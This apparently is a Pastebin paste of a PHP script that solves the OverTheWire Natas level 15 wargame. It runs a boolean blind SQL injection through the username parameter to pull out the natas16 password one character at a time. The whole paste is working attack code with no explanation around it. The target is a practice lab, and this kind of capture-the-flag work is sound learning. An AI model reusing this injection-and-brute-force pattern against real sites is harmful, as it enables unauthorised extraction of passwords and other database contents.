Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22%_PWD_%";
- $alphabet = array_merge(range('a', 'z'), range('A', 'Z'), range(0, 9));
- $opt = array(
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_USERPWD => "natas15:<censored>",
- CURLAUTH_ANY => true,
- );
- echo "============ INIT BREAKFORCE ATTEMPT =============<br />";
- echo "BASE URL: ".$url."<br />";
- echo "ALPHABET: ".implode(", ", $alphabet)."<br />";
- $pwdchars = array();
- $ch = curl_init();
- foreach ($alphabet as $char) {
- $opt[CURLOPT_URL] = str_replace("_PWD_", $char, $url);
- curl_setopt_array($ch, $opt);
- $response = curl_exec($ch);
- if (strpos($response, "exists") !== false) {
- $pwdchars []= $char;
- }
- };
- echo "=====================================<br />";
- echo "CHARS FOUND: " . implode(", ", $pwdchars);
- $pass = "";
- $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22_PWD_%";
- file_put_contents('php://stdout', '$pwdchars = '.print_r(implode(", ", $pwdchars), TRUE).PHP_EOL);
- while (strlen($pass) != 32) {
- foreach ($pwdchars as $char) {
- $attempt = $pass . $char;
- $opt[CURLOPT_URL] = str_replace("_PWD_", $attempt, $url);
- curl_setopt_array($ch, $opt);
- $response = curl_exec($ch);
- if (strpos($response, "exists") !== false) {
- $pass .= $char;
- file_put_contents('php://stdout', '$pass = '.print_r($pass, TRUE).PHP_EOL);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
